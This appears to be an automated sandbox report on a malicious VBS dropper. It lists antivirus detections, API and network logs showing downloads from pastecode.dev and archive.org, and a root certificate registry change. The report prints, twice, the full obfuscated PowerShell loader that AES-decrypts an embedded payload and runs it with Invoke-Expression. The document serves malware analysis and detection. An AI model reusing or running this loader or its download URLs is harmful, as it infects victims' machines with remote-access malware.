QViOO/34qAvsHA7lEy/DLqHEd0w+bLgM0Lo5vCElEUh6CCXB3XJA==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') filepath: powershell.exe	1	1	0

File has been identified by 7 AntiVirus engines on VirusTotal as malicious (7 events)

Symantec	ISB.Downloader!gen40
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus	Trojan.Script.Vbs-heuristic.druvzi
Microsoft	Trojan:VBS/Remcos.RTDC!MTB
ZoneAlarm	HEUR:Trojan-Downloader.Script.Generic
AVG	Script:SNH-gen [Trj]

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 24, 2024, 9:08 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (4 events)

Data sent	zvf EýpÒ}MâüuëËnÇ¹±¾µ;(I¦ò/5 ÀÀÀ À 285ÿia803405.us.archive.org
Data sent	zvf Eý0t\eÔ>J2*Z°nò6D`F zÓ/5 ÀÀÀ À 285ÿia803405.us.archive.org
Data sent	zvf Eþ`âoØ8xåk£»,VýÛp¬¨~w<ëõ/5 ÀÀÀ À 285ÿia803405.us.archive.org
Data sent	zvf Eþ°m`I¤_ÄyNÆîM_´ÛBé½1Mü/5 ÀÀÀ À 285ÿia803405.us.archive.org

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 24, 2024, 9:08 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Wscript.exe initiated network communications indicative of a script based payload download (16 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
InternetCrackUrlA July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
InternetReadFile July 24, 2024, 9:08 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc000c	1	1
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
InternetReadFile July 24, 2024, 9:08 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc000c	1	1
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0010 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369364
InternetReadFile July 24, 2024, 9:08 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc0014	1	1
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
InternetReadFile July 24, 2024, 9:08 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc000c	1	1
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0010 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369364
InternetReadFile July 24, 2024, 9:08 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc0014	1	1

wscript.exe-based dropper (JScript, VBS) (5 events)

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the processes wscript.exe, powershell.exe (30 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
send July 24, 2024, 9:08 a.m.	buffer: ! socket: 1224 sent: 1	1	1
send July 24, 2024, 9:08 a.m.	buffer: plf Eù.ô~\|n´ìä³Úá"X*"¬þÌ-QEkÑ/5 ÀÀÀ À 28+ÿ pastecode.dev socket: 1324 sent: 117	1	117
send July 24, 2024, 9:08 a.m.	buffer: ! socket: 1224 sent: 1	1	1
send July 24, 2024, 9:08 a.m.	buffer: FBAFÀº`ÆðJwQVxQÿê,r¬Áib¥â_F3¾ÐÌ(2Q$Ä¾£]tA3BóÃá@VÃ#½ü0}?BUÌ «-t¿Jª°ç§KÇ½9¯@Gds(Ü2¤@c¡SÞpoÔwï socket: 1324 sent: 134	1	134
send July 24, 2024, 9:08 a.m.	buffer: ! socket: 1224 sent: 1	1	1
send July 24, 2024, 9:08 a.m.	buffer: Pq¥ßysRº »dQÎBE)}µezÇêÔn¡\|À]+ ºÛõÁ´Ê>GÖySãÀNjÆP<5M6Å !ÿEâ)<Ô¥ì-añÖï¹Ì7®ÙÔ³ñPé\Òd¤N!ÀèÊ5Rë g>6G$TÍ£B+mìÆGw±åF¹×îÌ &0rÛäêYøøA»ÞN2N0x¨hæ³mªcæ8G/{wìåÂò_Vnq¼õï'µgt'vÊÅ&sñ75gÂQÝÃ©U® ãÁ+6>]?%_g=¥(ñÂ=§ì9\^ËK»ð±ÉWÀÞhý×ªKówÇ2?¶Ñ\¤¬OIë8î÷`@°´·.n0?Úz&¼\H5í¯îQ^ø¼aÏsÓ socket: 1324 sent: 341	1	341
send July 24, 2024, 9:08 a.m.	buffer: ! socket: 1224 sent: 1	1	1
InternetCrackUrlA July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
send July 24, 2024, 9:08 a.m.	buffer: °`zæUvp@3^¡`\öTLë¨ä®&æ^0Âº ¦WÒón{Õ0{¬<¾9@Í¯ñlv÷HUÌ®àO¾Ñ\|Tü«Â5 !Éw÷îÆSÌgù¿i"Ý-ï ¾ÁcÌÁZ4dBÃøaÉ¸ÅéÕH¼}xkEg á{Røv´ùõ)aµ¡¬e½¬véï{î{g,"@¥Í@,sæ(÷å=é+ ã 1râFsý8D¸1VÇ1 8Wåj3üh¹h½Ûyßvöxe÷fÀÕyùa`_ÿß¬¢"S9phoø&&ÆØÊýÆSyCXôGÿ}Hé?k\|ÆÞM¢ÉÊÝÝ+^øö×ËOþufjoM&\öÂÉæöI¥µ¤uÑ¡´xcgtÁ-£ßPB«ÛB^·HÌ¯±e,búy½0rñ2?jÏÅlïXëæú÷u§ÑhÐJwI1¬ÛW¼t'd~ï©åÜdDü"< socket: 1324 sent: 437	1	437
send July 24, 2024, 9:08 a.m.	buffer: ! socket: 1224 sent: 1	1	1
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0010 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369364
send July 24, 2024, 9:08 a.m.	buffer: °(åØ(äñ±¹!ÉDdHÉÑ§©ëz%aÒTkosOâwWgFÖÌmáÅYÝ Ë ?&^³þ DSÅ5Îò°oèérÉ+V Þa9àZNP¨;Qw9¼Mkæ[xæMÎødÆªXb³î"-Ó6 ðº§òfC¦Òaò°&F¥+{-ðmoÜK©½0·#$3Fú¢»À&¤::õ]xý !×k%Îë!Ûqh1rcgK^õÌp¶ÎhdZa»{ìu¬ÝKkü;H§¡$ÞÇìQºcÝõ\|³æ¦éÖ\|¿s¦×oÏûS±mÔÉCªb*É?"±j7'ìíãÏ÷°¦òáÅ8£æ¤²³²»õX#ðùd´DPJçU8f5J\M ÊLí¯[^×ö4ïCtÛñò¶eÄEÇÍ»kÅÈIÛÙe³\PCfµcí¨ú¯+äqö¥y/æ¶KC'ë:ta7r£h+óøëL+B¨Ð7.],µLgsAª socket: 1324 sent: 437	1	437
send July 24, 2024, 9:08 a.m.	buffer: ! socket: 1224 sent: 1	1	1
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
send July 24, 2024, 9:08 a.m.	buffer: °ÑM\|}Å#®ÌUÈÑeIe ·«ý%Ùs{·(¤[ Áwñ¯Gîe['!Z6@,¤MÆâ·3á;âÎjþCÆ#Û?ÄÒZøl$ÏÂ3nÿv¨£bVqXæ$vÎ?GÃPûÄLÏá°]Ú1°æLýó A×LÞ+6ö#6~Fóè¾Ç=!Vn8ÜtÌZo§ 2Bp5vª¬*ùrî¬³Ëþç}å¯%ëÌ8Ç±÷ÇcÆxm+sÙÁÖd )Ex)+1ó¤ÞN¥ÆeÉÓ°8x¿Ahò¦/[ªWuÿ?~Ø>ó<_Ê kþmúüC,P_Äb÷Pò(¡D^(/uCáÝêõtÒãÍfµ\|ß8á ¯ÙÛ¶Jé>´WøÊ÷õnqö5êÄa_\|>® FH8õ+ù¬cü.{I¤Ê])DGI.z(Ð4Yô×O})áëëÕ#M7üÏ_&e[y["qp socket: 1324 sent: 437	1	437
send July 24, 2024, 9:08 a.m.	buffer: ! socket: 1224 sent: 1	1	1
InternetCrackUrlW July 24, 2024, 9:08 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:08 a.m.	connect_handle: 0x00cc0010 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369364
send July 24, 2024, 9:08 a.m.	buffer: °Nò>óè>3åPsâÍ$AWî°PÈØ+÷Á²ïÓ¿ªà§tYÌäª£ôQfdOZÎÊàØ¡UÉ^.ÐhX94ÚÀ Ü²S¸£(S ¬äôÔ#ÖpvéP´Ù¦BU@ %8D^Öe¨Ðh'2X+$Ùma {8:ÌUDgÇÓõÜ ú òDfÀdm´p¶¨ ë ûzé ^¢Õ?ñbJÈ`Ù¿õ´rÈx"yPÕ6¨«øzFØ`«Äá¬Xªîz,èè®´ÛäÎ´8/£®¼6¤è¸ÍÈyjy(~OÖTyáp/³DZ¿}_Å^<S=/fX0:\S²âÑµtÐðHµ²Ù"«Kj^}ïò jñ$4N÷_^OÂÈÎ¯Y täZ8m¿ª°Våæ6ÛV%ú>Puú¤þQrÛVàEsæ/xÖf¯òDý¾ sYD»»mr^íÏ}U[Éï±ð~ªùb<ç socket: 1324 sent: 437	1	437
send July 24, 2024, 9:08 a.m.	buffer: ! socket: 1224 sent: 1	1	1
send July 24, 2024, 9:08 a.m.	buffer: zvf EýpÒ}MâüuëËnÇ¹±¾µ;(I¦ò/5 ÀÀÀ À 285ÿia803405.us.archive.org socket: 1332 sent: 127	1	127
send July 24, 2024, 9:08 a.m.	buffer: zvf Eý0t\eÔ>J2*Z°nò6D`F zÓ/5 ÀÀÀ À 285ÿia803405.us.archive.org socket: 1332 sent: 127	1	127
send July 24, 2024, 9:08 a.m.	buffer: zvf Eþ`âoØ8xåk£»,VýÛp¬¨~w<ëõ/5 ÀÀÀ À 285ÿia803405.us.archive.org socket: 1332 sent: 127	1	127
send July 24, 2024, 9:08 a.m.	buffer: zvf Eþ°m`I¤_ÄyNÆîM_´ÛBé½1Mü/5 ÀÀÀ À 285ÿia803405.us.archive.org socket: 1332 sent: 127	1	127

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87249095873756925133548634564426CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIZLpL9xl3Py+l8SR7slUHUevBi1kBPUVFUCXAdS1V5ry05GEIxWvXEOEv1VXBCN/6cFqtMoGP0r3wozPtH3gBxltdo0dRAPTvI+5L5jNRlmpL7WSN11Y+o37cmQECE8m5yoQaueGAvWVRkCK/PJggM1f7GsQuVUav7ecHNhuvfvbIUtomkHUSPUynPB7YxjwHb9VVASA6ynKfVj20Nfj8WQ7m2yfUEf4iX1Z2RtVRce/Tc/UOEG/UJWb/SMU7rylafB8vATtzQFPJtzBfjVsf3peHeI8xleZA8YPEScObOBTc+uNaMICEVs7R4BLmsc4l8PCLyph5Lgp++ElK7qI4jtp/RHIJuqorKpX6Z6enzP2OnM6Gdkj3oeTd6TDHXJRaUSOu4AP12kaFVPUHjF/0HzsFavMzg+Z0486QdMYNBAx5AM0K/ux8BInwP0WVlwkexz3i8PtSLHiOZjMZM0mfpBrZzyj7YNu+99FOBZSBWkgl7GF4VBexJkO7BuZQ/8KFjHyZNiHjGUzAMeLD2YOxqqb7qXZvV86/mnCaAdvTRkrdbsedMvxZLGwcdO/kFSezhOQHAxj0nTy50GK0fRfN+EouESXq0TyVPKn6RQ7NZA/tp6SscNfu0IZCTxk5yAfLRq0UUSRFHK7JDTbqfXFgnrlaDktcVcvJ7chZWsyZlaeTn8UD1NVuoPbwAo+cceAVYjSIEs/4nJQy4FeV3hup3tAK5+q1xAcHEfz5lyvj9gxOFUsAbIEtWoQq49ZMNoOe4mdm1N915TDKBfBvjhQWlKPOFU6VpIS1fjh9bD9luXJcqT3WMfXD2+rOvtqB77xcyJ5U4HPTw2wM5NXisVtECe42SWZhBCulh7qInAsksm8Uasns4sgc4u/dzWk9Pd72ZpmVeZlCQ5dmIrXeilYleXmsZPtjGXQdQXU1be07ioVuMLFRlQAYgvUZZAcqu1x2ndcER9XrnH5yo4xSvEfTYXNR7mJcPBdCf/a0OrfwlnDoNrIJVuNCW5tSSdt4dc6+HTvdpurrcwqDwVRoj1FvcEKPEZSpnqSICFzcP/VUBP5HPm+AxruprcAOd+XuLkUIu2P9E9RFLDfe/FyC6ZMBoNVfIUlre8xrGhKU8YplJh4xUKmzJWmGzQaX52PbhdD+oQK4QmH+gz31Xd26dXnY2i3pkowffE2WT0Hd1q8OtjkgmN3cEJtNHPOh+y74t++HAmn28qyqMsHrp3ZvFeLsn5CipIEWqbj085ABBwfkGiGHRoTArXWxB+KLgIqXhU9MJ5HCihOfq+K4TsBwkDBq0kGKVi7yYHM0H7cXTtl8xaeYdszb3+8UYMTd/VnYFBCIczEr8wLjI6lA+Wh4gMUfan/X7R0sMw8zDoJezuccj93Ja8+pzRDpUXE41+2rd+N+Js0A4OpwbrL2dMigMJlceKXw7S3skJXJNFR4GWUS8plXZkj+8KQAq6mLfuY81ETRclFSZ8AwZQXPZaQdPCL8cpqVBjdHDxaJGUO2W5/WV6XwBBZQBWYW14JnnGep6zNhQeAFLQFqG5brETFxYXmg7mMgkb9LdJXrFTc2W6wcp9XNvzBOgTYtHvCXLaKSJ4hp5EmpZvBWzE9CJvwVjkK4usRXyfei5Y3CB02D6OGurX9Un56ijcMiHjrmxs+O0kqc0JhxR8LJUXbao7SYEvms+CayWu2ST8GQ7smRUi0VR6bIx3AE3mSQ6HJQ5dNBANiQSmIg3deBJmWbspKm7azWwKCytzN//aoV7zQViOO/34qAvsHA7lEy/DLqHEd0w+bLgM0Lo5vCElEUh6CCXB3XJA==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87249095873756925133548634564426CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIZLpL9xl3Py+l8SR7slUHUevBi1kBPUVFUCXAdS1V5ry05GEIxWvXEOEv1VXBCN/6cFqtMoGP0r3wozPtH3gBxltdo0dRAPTvI+5L5jNRlmpL7WSN11Y+o37cmQECE8m5yoQaueGAvWVRkCK/PJggM1f7GsQuVUav7ecHNhuvfvbIUtomkHUSPUynPB7YxjwHb9VVASA6ynKfVj20Nfj8WQ7m2yfUEf4iX1Z2RtVRce/Tc/UOEG/UJWb/SMU7rylafB8vATtzQFPJtzBfjVsf3peHeI8xleZA8YPEScObOBTc+uNaMICEVs7R4BLmsc4l8PCLyph5Lgp++ElK7qI4jtp/RHIJuqorKpX6Z6enzP2OnM6Gdkj3oeTd6TDHXJRaUSOu4AP12kaFVPUHjF/0HzsFavMzg+Z0486QdMYNBAx5AM0K/ux8BInwP0WVlwkexz3i8PtSLHiOZjMZM0mfpBrZzyj7YNu+99FOBZSBWkgl7GF4VBexJkO7BuZQ/8KFjHyZNiHjGUzAMeLD2YOxqqb7qXZvV86/mnCaAdvTRkrdbsedMvxZLGwcdO/kFSezhOQHAxj0nTy50GK0fRfN+EouESXq0TyVPKn6RQ7NZA/tp6SscNfu0IZCTxk5yAfLRq0UUSRFHK7JDTbqfXFgnrlaDktcVcvJ7chZWsyZlaeTn8UD1NVuoPbwAo+cceAVYjSIEs/4nJQy4FeV3hup3tAK5+q1xAcHEfz5lyvj9gxOFUsAbIEtWoQq49ZMNoOe4mdm1N915TDKBfBvjhQWlKPOFU6VpIS1fjh9bD9luXJcqT3WMfXD2+rOvtqB77xcyJ5U4HPTw2wM5NXisVtECe42SWZhBCulh7qInAsksm8Uasns4sgc4u/dzWk9Pd72ZpmVeZlCQ5dmIrXeilYleXmsZPtjGXQdQXU1be07ioVuMLFRlQAYgvUZZAcqu1x2ndcER9XrnH5yo4xSvEfTYXNR7mJcPBdCf/a0OrfwlnDoNrIJVuNCW5tSSdt4dc6+HTvdpurrcwqDwVRoj1FvcEKPEZSpnqSICFzcP/VUBP5HPm+AxruprcAOd+XuLkUIu2P9E9RFLDfe/FyC6ZMBoNVfIUlre8xrGhKU8YplJh4xUKmzJWmGzQaX52PbhdD+oQK4QmH+gz31Xd26dXnY2i3pkowffE2WT0Hd1q8OtjkgmN3cEJtNHPOh+y74t++HAmn28qyqMsHrp3ZvFeLsn5CipIEWqbj085ABBwfkGiGHRoTArXWxB+KLgIqXhU9MJ5HCihOfq+K4TsBwkDBq0kGKVi7yYHM0H7cXTtl8xaeYdszb3+8UYMTd/VnYFBCIczEr8wLjI6lA+Wh4gMUfan/X7R0sMw8zDoJezuccj93Ja8+pzRDpUXE41+2rd+N+Js0A4OpwbrL2dMigMJlceKXw7S3skJXJNFR4GWUS8plXZkj+8KQAq6mLfuY81ETRclFSZ8AwZQXPZaQdPCL8cpqVBjdHDxaJGUO2W5/WV6XwBBZQBWYW14JnnGep6zNhQeAFLQFqG5brETFxYXmg7mMgkb9LdJXrFTc2W6wcp9XNvzBOgTYtHvCXLaKSJ4hp5EmpZvBWzE9CJvwVjkK4usRXyfei5Y3CB02D6OGurX9Un56ijcMiHjrmxs+O0kqc0JhxR8LJUXbao7SYEvms+CayWu2ST8GQ7smRUi0VR6bIx3AE3mSQ6HJQ5dNBANiQSmIg3deBJmWbspKm7azWwKCytzN//aoV7zQViOO/34qAvsHA7lEy/DLqHEd0w+bLgM0Lo5vCElEUh6CCXB3XJA==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

mydatinglifeissoggod.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All